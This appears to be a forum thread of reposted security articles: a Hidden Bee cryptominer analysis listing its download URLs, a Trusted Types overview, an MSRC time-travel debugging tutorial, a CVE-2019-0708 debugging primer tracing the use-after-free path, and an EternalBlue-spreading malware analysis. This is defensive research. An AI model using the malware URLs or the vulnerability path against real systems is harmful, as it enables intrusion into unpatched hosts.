    Consecutive modules are loaded one after another in the same executable memory area. After the module is loaded, its header is erased. It is a common technique used in order to make dumping of the payload from the memory more difficult.

    The cloudcompute.api is a plugin that will load the miner. More about the plugins will be explained in the next section of this post.

    Reading its code, we find out that the SPUTNIK modules are filesystems that can be mounted and dismounted on demand. This module will be communicating with others with the help of a named pipe. It will be receiving commands and executing appropriate handlers.

    Initialization of the commands’ parser:

    to_setup_commands.png

    The function setting up the commands: For each name, a handler is registered. (This is probably the Lua dispatcher, first described here.)

    setup_commands-1.png

    When plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case it is inside rundll32):

    plugin_running.png

    Also it triggers a firewall alert, which means the malware requested to open some ports (triggered by netscan.api plugin):

    open_ports.png

    We can see that it started listening on one TCP and one UDP port:

    socket.png

    The plugins

    As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.apideepfreeze.api, and netscan.api. If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. When we see the filled import table, we find out that the addresses have been filled redirecting to the functions from the previous NS module:

    mpsi_imports-1.png

    So we can conclude that the previous element is the mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled in the import tables of the loaded plugins.

    First the cloudcompute.api is run.

    This plugin retrieves from the filesystem a file named “/etc/ccmain.json” that contains the list of URLs:

    next_part_addresses.png

    Those are addresses from which another set of modules is going to be downloaded:

     

    ["sstp://news.onetouchauthentication.online:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.club:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.icu:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.xyz:443/mlf_plug.zip.sig"]

     

    It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in NE format (version converted to PE is available here: 367db629beedf528adaa021bdb7c12de)

    load_ccmain-600x309.png

    This is the component that is injected into msdtc.exe.

    implanted_in_msdtc.png The HiddenBee module mapped into msdtc.exe

    The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C:

    to_download_modules.png

    This is the plugin responsible for downloading and deploying the Mellifera Miner: core component of the Hidden Bee.

    Next, the netscan.api loads module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04)

    load_kernelbase.png

    The miner in APT-style

    Hidden Bee is an eclectic malware. Although it is a commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity.

    Appendix

    https://github.com/hasherezade/hidden_bee_tools – helper tools for parsing and converting Hidden Bee custom formats

    https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/

    Articles about the previous version (in Chinese):

    Our first encounter with the Hidden Bee:

    https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/

     

    Sursa: https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/

    • Upvote 1
  19.  

    18 years have passed since Cross-Site Scripting (XSS) has been identified as a web vulnerability class. Since then, numerous efforts have been proposed to detect, fix or mitigate it. We've seen vulnerability scanners, fuzzers, static & dynamic code analyzers, taint tracking engines, linters, and finally XSS filters, WAFs and all various flavours of Content Security Policy.

    Various libraries have been created to minimize or eliminate the risk of XSS: HTML sanitizers, templating libraries, sandboxing solutions - and yet XSS is still one of the most prevalent vulnerabilities plaguing web applications.

    It seems like, while we have a pretty good grasp on how to address stored & reflected XSS, "solving" DOM XSS remains an open question. DOM XSS is caused by ever-growing complexity of client-side JavaScript code (see script gadgets), but most importantly - the lack of security in DOM API design.

    But perhaps we have a chance this time? Trusted Types is a new browser API that
    allows a web application to limit its interaction with the DOM, with the goal of obliterating
    DOM XSS. Based on the battle-tested design that prevents XSS in most of the Google web applications, Trusted Types add the DOM XSS prevention API to the browsers. Trusted Types allow to isolate the application components that may potentially introduce DOM XSS into tiny, reviewable pieces, and guarantee that the rest of the code is DOM-XSS free. They can also leverage existing solutions like autoescaping templating libraries, or client-side sanitizers to use them as building blocks of a secure application.

    Trusted Types have a working polyfill, an implementation in Chrome and integrate well with existing JS frameworks and libraries. Oddly similar to both XSS filters and CSP, they are also fundamentally different, and in our opinion have a reasonable chance of eliminating DOM XSS - once and for all.

  20. Time travel debugging: It’s a blast! (from the past)

     
    May 29, 20190

    The Microsoft Security Response Center (MSRC) works to assess vulnerabilities that are externally reported to us as quickly as possible, but time can be lost if we have to confirm details of the repro steps or environment with the researcher to reproduce the vulnerability. Microsoft has made our “Time Travel Debugging” (TTD) tool publicly available to make it easy for security researchers to provide full repro, shortening investigations and potentially contributing to higher bounties (see “Report quality definitions for Microsoft’s Bug Bounty programs”). We use it internally, too—it has allowed us to find root cause for complex software issues in half the time it would take with a regular debugger.

    If you’re wondering where you can get the TTD tool and how to use it, this blogpost is for you.

    Understanding time travel debugging

    Whether you call it “Timeless debugging”, “record-replay debugging”, “reverse-debugging”, or “time travel debugging”, it’s the same idea: the ability to record the execution of a program. Once you have this recording, you can navigate forward or backward, and you can share with colleagues.  Even better, an execution trace is a deterministic recording; everybody looking at it sees the same behavior at the same time. When a developer receives a TTD trace, they do not even need to reproduce the issue to travel in the execution trace, they can just navigate through the trace file.

    There are usually three key components associated to time travel debugging:

    1. A recorder that you can picture as a video camera,
    2. A trace file that you can picture as the recording file generated by the camera,
    3. A replayer that you can picture as a movie player.

    Good ol’ debuggers

    Debuggers aren’t new, and the process of debugging an issue has not drastically changed for decades. The process typically works like this:

    1. Observing the behavior under a debugger. In this step, you recreate an environment like that of the finder of the bug. It can be as easy as running a simple proof-of-concept program on your machine and observing a bug-check, or it can be as complex as setting up an entire infrastructure with specific software configurations just to be able to exercise the code at fault. And that’s if the bug report is accurate and detailed enough to properly set up the environment.
    2. Understanding why the issue happened. This is where the debugger comes in. What you expect of a debugger regardless of architectures and platforms is to be able to precisely control the execution of your target (stepping-over, stepping-in at various granularity level: instruction, source-code line), setting breakpoints, editing the memory as well as editing the processor context. This basic set of features enables you to get the job done. The cost is usually high though. A lot of reproducing the issue over and over, a lot of stepping-in and a lot of “Oops... I should not have stepped-over, let’s restart”. Wasteful and inefficient.

    Whether you’re the researcher reporting a vulnerability or a member of the team confirming it, Time Travel Debugging can help the investigation to go quickly and with minimal back and forth to confirm details.

    High-level overview

    The technology that Microsoft has developed is called “TTD” for time-travel debugging. Born out of Microsoft Research around 2006 (cf “Framework for Instruction-level Tracing and Analysis of Program Executions”) it was later improved and productized by Microsoft’s debugging team. The project relies on code-emulation to record every event necessary that replay will need to reproduce the exact same execution. The exact same sequence of instructions with the exact same inputs and outputs. The data that the emulator tracks include memory reads, register values, thread creation, module loads, etc.

    Recording / Replaying

    xttd-img1.png

    The recording software CPU, TTDRecordCPU.dll, is injected into the target process and hijacks the control flow of the threads. The emulator decodes native instructions into an internal custom intermediate language (modeled after simple RISC instructions), caches block, and executes them. From now on, it carries the execution of those threads forward and dispatches callbacks whenever an event happens such as: , when an instruction has been translated, etc. Those callbacks allow the trace file writer component to collect information needed for the software CPU to replay the execution based off the trace file.

    xttd-img2.png

    The replay software CPU, TTDReplayCPU.dll shares most of the same codebase than the record CPU, except that instead of reading the target memory it loads data directly from the trace file. This allows you to replay with full fidelity the execution of a program without needing to run the program.

    The trace file

    The trace file is a regular file on your file system that ends with the ‘run’ extension. The file uses a custom file format and compression to optimize the file size. You can also view this file as a database filled with rich information. To access information that the debugger requires very fast, the “WinDbg Preview” creates an index file the first time you open a trace file. It usually takes a few minutes to create. Usually, this index is about one to two times as large as the original trace file. As an example, a tracing of the program ping.exe on my machine generates a trace file of 37MB and an index file of 41MB. There are about 1,973,647 instructions (about 132 bits per instruction). Note that, in this instance, the trace file is so small that the internal structures of the trace file accounts for most of the space overhead. A larger execution trace usually contains about 1 to 2 bits per instruction.

    Recording a trace with WinDbg Preview

    Now that you’re familiar with the pieces of TTD, here’s how to use them.

    Get TTD: TTD is currently available on Windows 10 through the “WinDbg Preview” app that you can find in the Microsoft store: https://www.microsoft.com/en-us/p/windbg-preview/9pgjgd53tn86?activetab=pivot:overviewtab.

    xttd-img3.png

    Once you install the application the “Time Travel Debugging - Record a trace” tutorial will walk you through recording your first execution trace.

    Building automations with TTD

    A recent improvement to the Windows debugger is the addition of the debugger data model and the ability to interact with it via JavaScript (as well as C++). The details of the data model are out of scope for this blog, but you can think of it as a way to both consume and expose structured data to the user and debugger extensions. TTD extends the data model by introducing very powerful and unique features available under both the @$cursession.TTD and @$curprocess.TTD nodes.

    xttd-img4.png

    TTD.Calls is a function that allows you to answers questions like “Give me every position where foo!bar has been invoked” or “Is there a call to foo!bar that returned 10 in the trace”. Better yet, like every collection in the data-model, you can query them with LINQ operators. Here is what a TTD.Calls object look like:

    
    0:000> dx @$cursession.TTD.Calls("msvcrt!write").First()
    @$cursession.TTD.Calls("msvcrt!write").First()
        EventType        : Call
        ThreadId         : 0x194
        UniqueThreadId   : 0x2
        TimeStart        : 1310:A81 [Time Travel]
        TimeEnd          : 1345:14 [Time Travel]
        Function         : msvcrt!_write
        FunctionAddress  : 0x7ffec9bbfb50
        ReturnAddress    : 0x7ffec9be74a2
        ReturnValue      : 401
        Parameters
    

    The API completely hides away ISA specific details, so you can build queries that are architecture independent.

    TTD.Calls: Reconstructing stdout

    To demo how powerful and easy it is to leverage these features, we record the execution of “ping.exe 127.0.0.1” and from the recording rebuild the console output.

    Building this in JavaScript is very easy:

    1. Iterate over every call to msvcrt!write ordered by the time position,
    2. Read several bytes (the amount is in the third argument) pointed by the second argument,
    3. Display the accumulated results.
    
    'use strict';
    function initializeScript() {
        return [new host.apiVersionSupport(1, 3)];
    }
    function invokeScript() {
        const logln = p => host.diagnostics.debugLog(p + '\n');
        const CurrentSession = host.currentSession;
        const Memory = host.memory;
        const Bytes = [];
        for(const Call of CurrentSession.TTD.Calls('msvcrt!write').OrderBy(p => p.TimeStart)) {
            Call.TimeStart.SeekTo();
            const [_, Address, Count] = Call.Parameters;
            Bytes.push(...Memory.readMemoryValues(Address, Count, 1));
        }
        logln(Bytes.filter(p => p != 0).map(
            p => String.fromCharCode(p)
        ).join(''));
    }
    

    xttd-img5.png

    TTD.Memory: Finding every thread that touched the LastErrorValue

    TTD.Memory is a powerful API that allows you to query the trace file for certain types (read, write, execute) of memory access over a range of memory. Every resulting object of a memory query looks like the sample below:

    
    0:000> dx @$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First()
    @$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First()
        EventType        : MemoryAccess
        ThreadId         : 0xb10
        UniqueThreadId   : 0x2
        TimeStart        : 215:27 [Time Travel]
        TimeEnd          : 215:27 [Time Travel]
        AccessType       : Write
        IP               : 0x76e6c8be
        Address          : 0x7fffffde068
        Size             : 0x4
        Value            : 0x0
    

    This result identifies the type of memory access done, the time stamp for start and finish, the thread accessing the memory, the memory address accessed, where it has been accessed and what value has been read/written/executed.

    To demonstrate its power, let’s create another script that collects the call-stack every time the application writes to the LastErrorValue in the current thread’s environment block:

    1. Iterate over every memory write access to &@$teb->LastErrorValue,
    2. Travel to the destination, dump the current call-stack,
    3. Display the results.
    
    'use strict';
    function initializeScript() {
        return [new host.apiVersionSupport(1, 3)];
    }
    function invokeScript() {
        const logln = p => host.diagnostics.debugLog(p + '\n');
        const CurrentThread = host.currentThread;
        const CurrentSession = host.currentSession;
        const Teb = CurrentThread.Environment.EnvironmentBlock;
        const LastErrorValueOffset = Teb.targetType.fields.LastErrorValue.offset;
        const LastErrorValueAddress = Teb.address.add(LastErrorValueOffset);
        const Callstacks = new Set();
        for(const Access of CurrentSession.TTD.Memory(
            LastErrorValueAddress, LastErrorValueAddress.add(8), 'w'
        )) {
            Access.TimeStart.SeekTo();
            const Callstack = Array.from(CurrentThread.Stack.Frames);
            Callstacks.add(Callstack);
        }
        for(const Callstack of Callstacks) {
            for(const [Idx, Frame] of Callstack.entries()) {
                logln(Idx + ': ' + Frame);
            }
            logln('----');
        }
    }
    

    xttd-img6.png

    Note that there are more TTD specific objects you can use to get information related to events that happened in a trace, the lifetime of threads, so on. All of those are documented on the “Introduction to Time Travel Debugging objects” page.

    
    0:000> dx @$curprocess.TTD.Lifetime
    @$curprocess.TTD.Lifetime                 : [F:0, 1F4B:0]
        MinPosition      : F:0 [Time Travel]
        MaxPosition      : 1F4B:0 [Time Travel]
    0:000> dx @$curprocess.Threads.Select(p => p.TTD.Position)
    @$curprocess.Threads.Select(p => p.TTD.Position)
        [0x194]          : 1E21:104 [Time Travel]
        [0x7e88]         : 717:1 [Time Travel]
        [0x5fa4]         : 723:1 [Time Travel]
        [0x176c]         : B58:1 [Time Travel]
        [0x76a0]         : 1938:1 [Time Travel]
    

    Wrapping up

    Time Travel Debugging is a powerful tool for security software engineers and can also be beneficial for malware analysis, vulnerability hunting, and performance analysis. We hope you found this introduction to TTD useful and encourage you to use it to create execution traces for the security issues that you are finding. The trace files generated by TTD compress very well; we recommend to use 7zip (usually shrinks the file to about 10% of the original size) before uploading it to your favorite file storage service.

    Axel Souchet

    Microsoft Security Response Center (MSRC)

    FAQ

    Can I edit memory during replay time?

    No. As the recorder only saves what is needed to replay a particular execution path in your program, it doesn’t save enough information to be able to re-simulate a different execution.

    Why don’t I see the bytes when a file is read?

    The recorder knows only what it has emulated. Which means that if another entity (the NT kernel here but it also could be another process writing into a shared memory section) writes data to memory, there is no way for the emulator to know about it. As a result, if the target program never reads those values back, they will never appear in the trace file. If they are read later, then their values will be available at that point when the emulator fetches the memory again. This is an area the team is planning on improving soon, so watch this space 😊.

    Do I need private symbols or source code?

    You don’t need source code or private symbols to use TTD. The recorder consumes native code and doesn’t need anything extra to do its job. If private symbols and source codes are available, the debugger will consume them and provide the same experience as when debugging with source / symbols.

    Can I record kernel-mode execution?

    TTD is for user-mode execution only.

    Does the recorder support self-modifying code?

    Yes, it does!

    Are there any known incompatibilities?

    There are some and you can read about them in “Things to look out for”.

    Do I need WinDbg Preview to record traces?

    Yes. As of today, the TTD recorder is shipping only as part of “WinDbg Preview” which is only downloadable from the Microsoft Store.

    References

    Time travel debugging

    1. Time Travel Debugging - Overview - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview
    2. Time Travel Debugging: Root Causing Bugs in Commercial Scale Software -https://www.youtube.com/watch?v=l1YJTg_A914
    3. Defrag Tools #185 - Time Travel Debugging – Introduction - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-185-Time-Travel-Debugging-Introduction
    4. Defrag Tools #186 - Time Travel Debugging – Advanced - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-186-Time-Travel-Debugging-Advanced
    5. Time Travel Debugging and Queries – https://github.com/Microsoft/WinDbg-Samples/blob/master/TTDQueries/tutorial-instructions.md
    6. Framework for Instruction-level Tracing and Analysis of Program Executions - https://www.usenix.org/legacy/events/vee06/full_papers/p154-bhansali.pdf
    7. VulnScan – Automated Triage and Root Cause Analysis of Memory Corruption Issues - https://blogs.technet.microsoft.com/srd/2017/10/03/vulnscan-automated-triage-and-root-cause-analysis-of-memory-corruption-issues/
    8. What’s new in WinDbg Preview - https://mybuild.techcommunity.microsoft.com/sessions/77266

    Javascript / WinDbg / Data model

    1. WinDbg Javascript examples - https://github.com/Microsoft/WinDbg-Samples
    2. Introduction to Time Travel Debugging objects - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-object-model
    3. WinDbg Preview - Data Model - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-data-model-preview

     

    Sursa: https://blogs.technet.microsoft.com/srd/2019/05/29/time-travel-debugging-its-a-blast-from-the-past/

  21. A Debugging Primer with CVE-2019–0708

    Go to the profile of Bruce Lee
    Bruce LeeFollow
    May 29
     

    By: @straight_blast ; straightblast426@gmail.com

     

    The purpose of this post is to share how one would use a debugger to identify the relevant code path that can trigger the crash. I hope this post will be educational to people that are excited to learning how to use debugger for vulnerability analysis.

    This post will not visit details on RDP communication basics and MS_T120. Interested readers should refer to the following blogs that sum up the need to know basis:

    Furthermore, no PoC code will be provided in this post, as the purpose is to show vulnerability analysis with a debugger.

    The target machine (debuggee) will be a Windows 7 x64 and the debugger machine will be a Windows 10 x64. Both the debugger and debuggee will run within VirtualBox.

    Setting up the kernel debugging environment with VirtualBox

    1. On the target machine, run cmd.exe with administrative privilege. Use the bcdedit command to enable kernel debugging.
    bcdedit /set {current} debug yes
    bcdedit /set {current} debugtype serial
    bcdedit /set {current} debugport 1
    bcdedit /set {current} baudrate 115200
    bcdedit /set {current} description "Windows 7 with kernel debug via COM"

    When you type bcdedit again, something similar to the following screenshot should display:

    1*AIzE7lB100OxAA5TFroE5Q.png

    2. Shutdown the target machine (debuggee) and right click on the target image in the VirtualBox Manager. Select “Settings” and then “Serial Ports”. Copy the settings as illustrated in the following image and click “OK”:

    1*wt0WogyFttm4uFebtkmpYg.png

    3. Right click on the image that will host the debugger, and go to the “Serial Ports” setting and copy the settings as shown and click “OK”:

    1*Kb4_P4v7o3yA5FOBwg_04g.png

    4. Keep the debuggee VM shutdown, and boot up the debugger VM. On the debugger VM, download and install WinDBG. I will be using the WinDBG Preview edition.

    5. Once the debugger is installed, select “Attach to kernel”, set the “Baud Rate” to “115200" and “Port” to “com1”. Click on the “initial break” as well.

    1*IIbwGiQeqoVBaptY15LWJQ.png

    Click “OK” and the debugger is now ready to attach to the debuggee.

    1*OMaH8p1OtrHZUjkjmpcAqg.png

    6. Fire up the target “debuggee” machine, and the following prompt will be displayed. Select the one with “debugger enabled” and proceed.

    1*z89v_TrIHlATFcqteH-39Q.png

    On the debugger end, the WinDBG will have established a connection with the debuggee. It is going to require a few manual enter of “g” into the “debugger command prompt” to have the debuggee completely loaded up. Also, because the debugging action is handled through “com”, the initial start up will take a bit of time.

    1*IzFQCRqw7LOMSo_4ET8mCw.png

    7. Once the debuggee is loaded, fire up “cmd.exe” and type “netstat -ano”. Locate the PID that runs port 3389, as following:

    1*GeNibmgftlPi-pC-AWRajQ.png

    8. Go back to the debugger and click on “Home” -> “Break” to enable the debugger command prompt and type:

    !process 0 0 svchost.exe

    This will list a bunch of process that is associated with svchost.exe. We’re interested in the process that has PID 1216 (0x4C0).

    1*hnlWU3RncscxHJwGxHVmfw.png

    9. We will now switch into the context of svchost.exe that runs RDP. In the debugger command prompt, type:

    .process /i /p fffffa80082b72a0
    1*z75Swdx6Jr_cGj0NJnGR3Q.png

    After the context switched, pause the debugger and run the command “.reload” to reload all the symbols that the process will use.

    Identifying the relevant code path

    Without repeating too much of the public information, the patched vulnerability have code changed in the IcaBindVirtualChannels. We know that if IcaFindChannelByName finds the string “MS_T120”, it calls IcaBindchannel such as:

    _IcaBindChannel(ChannelControlStructure*, 5, index, dontcare) 

    The following screenshots depicts the relevant unpatched code in IcaBindVirtualChannels:

    1*CDCdZolftT4TP-yRanJO6g.png

    We’re going to set two breakpoints.

    One will be on _IcaBindChannel where the channel control structure is stored into the channel pointer table. The index of where the channel control structure is stored is based on the index of where the Virtual Channel name is declared within the clientNetworkData of the MCS Initial Connect and GCC Create packet.

    1*rHcNi3I9cnk6Tym-nHTPiA.png

    and the other one on the “call _IcaBindChannel” within the IcaBindVirtualChannels.

    1*eZIx1sqp0EBMFDjIAJ_rTA.png

    The purpose of these breakpoints areto observe the creation of virtual channels and the orders these channels are created.

    bp termdd!IcaBindChannel+0x55 ".printf \"rsi=%d and rbp=%d\\n\", rsi, rbp;dd rdi;.echo"
    bp termdd!IcaBindVirtualChannels+0x19e ".printf \"We got a MS_T120, r8=%d\\n\",r8;dd rcx;r $t0=rcx;.echo"

    The breakpoint first hits the following, with an index value of “31”:

    1*_yEEI0wzIXW8r_3f6GZASg.png

    Listing the call stack with “kb” shows the following:

    1*L6U0WL7B__gcxl-9yE7eRQ.png

    We can see the IcaBindChannel is called from a IcaCreateChannel, which can be traced all the way to the rdpwsx!MSCreateDomain. If we take a look at that function under a disassembler, we noticed it is creating the MS_T120 channel:

    1*dd48IRwe_beYsfd225BZTA.png

    Also, but looking at the patched termdd.sys, we know that the patched code enforces the index for MS_T120 virtual channel to be 31, this first breakpoint indicates the first channel that gets created is the MS_T120 channel.

    The next breakpoint hit is the 2nd breakpoint (within the IcaBindVirtualChannel), followed by the 1st breakpoint (within IcaBindChannel) again:

    1*dEvUyKCqqEHJsDJq-iDsbw.png

    This gets hit as it observed the MS_T120 value from the clientNetworkData. If we compared the address and content displayed in above image with the one way, way above, we can see they’re identical. This means both are referring to the same channel control structure. However, the reference to this structure is being stored at two different locations:

    rsi = 31, rbp = 5; 
    [rax + (31 + 5) * 8 + 0xe0] = MST_120_structure
    rsi = 1, rbp = 5; 
    [rax + (1 + 5) * 8 + 0xe0] = MS_T120_structure

    In another words, there are two entries in the channel pointer table that have references to the MS_T120 structure.

    Afterwards, a few more channels are created which we don’t care about:

    1*0XpXhYpK3TruRMqd_Kb0lg.png
    index 7 with offset 5
    1*V9RHo_0uh1JSQrttxyqK4A.png
    index 0 with offset 0 and 1
    1*X1ocLB21TvYIq4chhKY4rg.png
    index 0 with offset 3 and 4

    The next step into finding other relevant code to look at will be to set a break read/write on the MS_T120 structure. It is with certain the MS_T120 structure will be ‘touch’ in the future.

    I set the break read/write breakpoint on the data within the red box, as shown in the following:

    1*tgOiIY68k5479OoUhM4A-g.png

    As we proceed with the execution, we get calls to IcaDereferenceChannel, which we’re not interested in. Then, we hit termdd!IcaFindChannel, with some more information to look into from the call stack:

    1*NpcA5JUnj9YNeOTsC8L5Sg.png

    The termdd!IcaChannelInput and termdd!IcaChannelInputInternal sounds like something that might process data sent to the virtual channel.

    A pro tip is to set breakpoint before a function call, to see if the registers or stacks (depending how data are passed to a function) could contain recognizable or readable data.

    I will set a breakpoint on the call to IcaChannelInputInternal, within the IcaChannelInput function:

    1*2At3O-wfmyE_nDfiZmKnwQ.png
    bp termdd!IcaChannelInput+0xd8
    1*TdI8x5qBTYDBxcC1qtGHog.png

    We’re interested in calls to the IcaChannelInput breakpoint after IcaBindVirtualChannels has been called. From the above image, just right before the call to IcaChannelInputInternal, the rax register holds an address that references to the “A”s I passed over as data through the virtual channel.

    I will now set another set of break on read/write on the “A”s to see what code will ‘touch’ them.

    ba r8 rax+0xa 

    The reason I had to add 0xA to the rax register is because the break on read/write requires an align address (ends in0x0 or 0x8 for x64 env)

     
    1*HUOcZ9-zDDUaOxCk5BG3Ww.png

    So the “A”s are now being worked in a “memmove” function. Looking at the call stack, the “memmove” is called from the “IcaCopyDataToUserBuffer”.

    1*XwtI06FcqJopoA5qzT62bQ.png

    Lets step out (gu) of the “memmove” to see where is the destination address that the “A”s are moving to.

    1*AwCi9Gn1BIvhWVxluy__Ng.png

    Which is here looking at it from the disassembler:

     
    1*ta3wPY7F3Q-pI9D8Uh2qwg.png

    The values for “Src”, “Dst” and “Size” are as follow:

     
    1*eWBvBwc4_iNUO0BcjBCShw.png
    Src
     
    1*CfWNhH3n1UNZaIva7QD4wg.png
    Dst
     
    1*h7YQ6LOr4OmWaZECw2cdsg.png
    Size (0x20)

    So the “memmove” copy “A”s from an kernel’s address space into a user’s address space.

    We will now set another groups of break on read/write on the user’s address space to see how these values are ‘touched’

    ba r8 00000000`030ec590
    ba r8 00000000`030ec598
    ba r8 00000000`030ec5a0
    ba r8 00000000`030ec5a8

    (side note: If you get a message “Too many data breakpoints for processor 0…”, remove some of the older breakpoints you set then enter “g” again)

    We then get a hit on rdpwsx!IoThreadFunc:

    1*dn2Of3cIMZYm8f8XS_l5lA.png

    The breakpoint touched the memory section in the highlighted red box:

    1*Z7YT6CxNBCeSzONtaCp38Q.png

    The rdpwsx!IoThreadFunc appears to be the code that parses and handle the MS_T120 data content.

    1*OB_F6YbPzOJuCMZWQdEYiA.png

    Using a disassembler will provide a greater view:

    1*WetrbCoWpW1VCBYnVlqAag.png
    1*b_bKe4aOQF-FSv8vwIoAJg.png

    We will now use “p” command to step over each instruction.

    1*V2B4Nvt7LzeSpjx7Wc9APg.png

    It looks like because I supplied ‘AAAA’, it took a different path.

    According to the blog post from ZDI, we need to send crafted data to the MS_T120 channel (over our selected index), so it will terminate the channel (free the MS_T120 channel control structure), such that when the RDPWD!SignalBrokenConnection tries to reach out to the MS_T120 channel again over index 31 from the channel pointer structure, it will Use a Freed MS_T120 channel control structure, leading to the crash.

    Based on the rdpwsx!IoThreadFunc, it appears to make sense to create crafted data that will hit the IcaChannelClose function.

    When the crafted data is correct, it will hit the rdpwsx!IcaChannelClose

    1*0BHufYT5djDQC88cxNMfbg.png

    Before stepping through the IcaChannelClose, lets set a breakpoint on the MS_T120 control channel structure to see how does it get affected1*Y8TDQzqoEXXnXO0b8RVFyQ.png

    fffffa80`074fcac0 is the current address for the MS_T120 structure
     
    1*G3NMQC-5mtPqa19JoQFbpw.png
    A breakpoint read is hit on fffffa80`074fcac0

    The following picture shows the call stack when the breakpoint read is hit. A call is made to ExFreePoolWithTag, which frees the MS_T120 channel control structure.

    1*fqk0hBug1IhyejA3yc5SVA.png

    We can proceed with “g” until we hit the breakpoint in termdd!IcaChannelInput:

    1*RQdv3tA3Rxd6Yv8blmD34g.png

    Taking a look at the address that holds the MS_T120 channel control structure, the content looks pretty different.

    Furthermore, the call stack shows the call to IcaChannelInput comes from RDPWD!SignalBrokenConnection. The ZDI blog noted this function gets called when the connection terminates.

    1*UHpyt8DixO0Xllsd5v_rZQ.png

    We will use “t” command to step into the IcaChannelInputInternal function. Once we’re inside the function, we will set a new breakpoint:

    bp termdd!IcaFindChannel
    1*yHbBkVqw_dCtTTrQWgoRDQ.png

    Once we’re inside the IcaFindChannel function, use “gu” to step out of it to return back to the IcaChannelInputInternal function:

    1*Zv2KPJ_fxQ3mon0dzu26cw.png
    The MS_T120 object address is different to other MS_T120 object shown above, as these images are taken aross different debugging session

    The rax registers holds the reference to the freed MS_T120 control channel structure.

    As we continue to step through the code, the address at MS_T120+0x18 is being used as an parameter (rcx) to the ExEnterCriticalRegionAndAcquireResourceExclusive function.1*Ynl_4KUwRTsChKia2lpmJg.png

    Lets take a look at rcx:

    1*LReRDcLxD5l9CkJ-GCY9zw.png

    And there we go, if we dereference rcx, it is nothing! So lets step over ExEnterCriticalRegionAndAcquireResourceExclusive and see the result:

    1*A2fxsljel8cn6KoGKn7PIQ.png
  22. Dynamic Analysis of a Windows Malicious Self-Propagating Binary

    May 29, 2019 by Adrian Hada

    Dynamic analysis (execution of malware in a controlled, supervised environment) is one of the most powerful tools in the arsenal of a malware analyst. However, it does come with its challenges. Attackers are aware that they might be watched, so we must take steps to ensure that the analysis machine (aka: sandbox) is invisible to the binary under analysis. Also, since we are granting a piece of malware CPU time, it can use it to further the threat actor’s intent.

    In this blog post, I will walk you through the analysis of one such binary. The malware at hand infects a computer, steals some local information and then proceeds to identify vulnerable targets on the local network and in the greater internet. Once a target has been found, it attempts to deliver malware on that machine. Such self-propagating malware has been in the news a lot in the past couple of years because of WannaCry, Mirai and other threats exhibiting this behavior. However, this technique is not limited to these families of malware – self-propagation has been around since the Morris worm of the late ‘80s – and we expect it to be used more and more. This raises a dilemma for those analyzing malware – by not limiting the things malware does, we’re granting them useful CPU cycles. By limiting them, we are unable to completely analyze the malware to determine all of its capabilities. 

    AN INTERESTING TARGET

    The sample at hand is a Windows binary with SHA256 54a1d78c1734fa791c4ca2f8c62a4f0677cb764ed8b21e198e0934888a735ef8 that we detected in May.

    1

    Figure 1 - Basic information for binary

    The first things that stand out are its large size – 2.6MB – and the fact that it was compressed using PECompact2. PECompact is an application that is able to reduce the size of a given binary and, with the correct plugins, can also offer reverse-engineering protection. This is probably an attempt on the attacker’s part to make the binary smaller (faster and less conspicuous delivery) and cause trouble for antivirus products to detect. 

    A quick search on VirusTotal shows that this is not the case – 49 out of the 71 detection engines detect it as malicious. Some of the detection names point to The Shadow BrokersEquation Groupand WannaCry. Community information also points to mimikatz, a tool used to steal interesting security tokens from Windows memory after an attacker has established a foothold.

    2

    Figure 2 - Detections pointing to known threats and leaks

    LOCAL EXECUTION

    When executed, the malicious binary drops multiple files on the Windows system. One of these is a version of mimikatz, as mentioned above, dropped under the name “C:\Users\All Users\mmkt.exe”. This file is executed and drops a series of files to the local file system containing interesting system tokens:

    • C:\ProgramData\uname
    • C:\Users\All users\uname
    • C:\ProgramData\upass
    • C:\Users\All users\upass

    Other dropped files include some necessary DLL files as well as six other interesting files: two executables, two XML files and two files with the extension “.fb”, all to the folder C:\ProgramData:

    • Blue.exe
    • Blue.xml
    • Blue.fb
    • Star.exe
    • Star.xml
    • Star.fb

    The 6 files belong to the exploitation toolkit known as FuzzBunch, part of the ShadowBrokers dump, and are required to execute the exploit known as ETERNALBLUE and the DOUBLEPULSAR backdoor that could be deployed using the exploit. The pair has been used in attacks extensively since the dump and WannaCry came out – see the ATI team blogpost on WannaCry as well as another blogpost on other threats exploiting this in the wild after the leak came out. Although the exploits in the ShadowBrokers dump have been around for quite some time, our 2019 Security Report clearly points out that exploitation attempts for vulnerable targets are alive and kicking.

    3

    Figure 3 - EternalBlue files from original dump

    The XML and .fb files are identical to the ones from the original ShadowBrokers leak.

    4

    Figure 4 - EternalBlue-2.2.0.fb from ShadowBrokers dump

    5

    Figure 5 - blue.fb from the sample analysis

    It becomes clear that this sample is intent upon spreading as far as possible. It’s time to look at the network traffic involved to identify what it is doing.

    NETWORK TRAFFIC

    Analyzing the network capture with Wireshark, we see a lot of different contacted endpoints:

    6

    Figure 6 - Extract from the list of IP addresses contacted by the sample

